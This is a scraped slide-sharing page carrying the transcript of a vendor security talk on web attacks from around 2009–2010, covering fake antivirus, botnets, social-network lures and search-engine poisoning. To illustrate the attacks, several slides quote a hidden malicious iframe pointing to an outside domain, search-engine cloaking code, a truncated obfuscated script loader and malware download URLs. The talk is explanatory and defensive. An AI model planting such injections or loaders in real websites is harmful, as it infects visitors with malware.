the anatomy of a web attack l.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
The Anatomy of a Web Attack PowerPoint Presentation
Download Presentation
The Anatomy of a Web Attack

Loading in 2 Seconds...

play fullscreen
1 / 23

The Anatomy of a Web Attack - PowerPoint PPT Presentation


  • 152 Views
  • Uploaded on

The Anatomy of a Web Attack. Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com. Agenda. State of the Web Top categories Top attacks The Anatomy of a Web Attack Lures to web threats Examples Dynamic Link Analysis. Best of the Worst.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'The Anatomy of a Web Attack' - jalene


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
the anatomy of a web attack

The Anatomy of a Web Attack

Dennis Pike

Systems Engineer

Geo Specialists Lead – Americas Security

dennis.pike@bluecoat.com

agenda
Agenda
  • State of the Web
    • Top categories
    • Top attacks
  • The Anatomy of a Web Attack
    • Lures to web threats
    • Examples
  • Dynamic Link Analysis
best of the worst
Best of the Worst
  • Top Web Category?

>> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity

  • Top Web threat?

>> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer.

>>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. *

>>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. *

*Google Inc.

email vs social networking
Email vs Social Networking
  • Do more people use email or social networking sites?

>> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent.

noteworthy items
Noteworthy Items

Argument for Video (HTTP and Streaming)

changing web habits
Changing Web Habits
  • Top 10 Categories – 2009
  • WebFilter/WebPulse, 62M+ Users
  • 1. Social Networking
  • 2. Web Advertisements
  • 3. Search Engines/Portals
  • 4. Personals/Dating
  • 5. Pornography
  • 6. Computers/Internet
  • 7. Audio/Video Clips
  • 8. Adult/Mature Content
  • 9. Web Email
  • 10. Illegal/Questionable

Social Networking

Moved to #1 from #2 position

Represents 25% of Top10 requests

Web Email

Dropped to #9 from #5 position

Users migrating to social networking

Cyber Crime Leverages

Search engine poisoning

Fake AV and Codec updates

Popular site injections

Death, Drama & Disaster lures

Health & Wealth scams

web threats rising exponentially
Web Threats Rising Exponentially
  • 2/3 of all known malicious code threats in 1 year (Symantec April’09)
  • 1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
distribution power
Distribution Power
  • Botnet computing power to:

Pitch worthless products

Hijack online banking accounts

Steal corporate data

Top 5

Botnets

in 2009

Koobface B

Koobface D

Botnet

Zeus

Monkif A

Clickbot

1,070,000

Peak

number

of active

bots

812,000

599,000

506,000

375,000

How it

spreads

Search Results

Facebook

Twitter

Social

Networking

USA TODAY Research – March 2010

an invitation to crime

2 – Program messages

user’s friends asking

them to click on a link

to a photo or video.

3 – Anyone who clicks

on the link is asked to

enable a media player

needed to see the

images. Running the

file turns the PC into

a bot.

4 – The bot steals the PC

owners logon credentials,

starting the cycle again.

USA TODAY Research – March 2010

An Invitation to Crime

1 – An automated

program logs on

to social network

using stolen user

credentials.

web evolution
Web Evolution

Static Pages

Dynamic Pages

Dynamic Pages

Interactive Pages

Publishing Model

Community Model

Single Host Pages

Multi-Host Pages

Nice to Have

Must Have

10

paths to malware infection
Paths to Malware Infection

Link Farms

Infected Site

Search Engine

Blogs, Forums

Relay

Bait

Malware

12

end user infected site
End User…Infected Site

www.inka.com

<html>

<iframesrc="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id=“header”>

</html>

homenameregistration.cn/in.cgi?income12

web 2 0 and search engines
Web 2.0 and Search Engines

Forums

Blogs

Wikis

Guestbooks

WWW

?

Search Engine

View

14

web 2 0 and search engines15
Web 2.0 and Search Engines

WWW

Links…

Links…

Links…

Links…

Links…

Links…

Words…

Words…

Words…

Search Engine

View

Links…

Links…

Links…

15

hijacked website
Hijacked Website

if (“search engine”) {

echo “…indexable content…”

} else {

echo “<body><script src="live.js"></script>”

}

xdesignstudios.com

dir1

index.php

id=fall+printable+coloring+pages

id=free+printable+easter+drawings

id=disney+printable+cartoon+characters

id=free+printable+halloween+sheets

id=girls+free+printable+organizer

id=in+store+printable+catherines+coupons

live.js

end user search engine redirect
End User…Search Engine Redirect

index.php?id=hannah-montana-printable-birthday-invitations

<body>

<script src="live.js">

</script>

live.js

document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…

http://cracksinside.com/red/gen.js

what just happened
What just happened?

WWW

Links…

Links…

Links…

Links…

Links…

Links…

Words…

Words…

Words…

Search Engine

View

Links…

Links…

Links…

Redirect

20

recent examples vbmania
Recent Examples - VBMania

www.sharedocuments.com/library/PDF_Document21.025542010.pdf

Email text

www.sharedocuments.com/library/PDF_Document21.025542010.pdf

members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr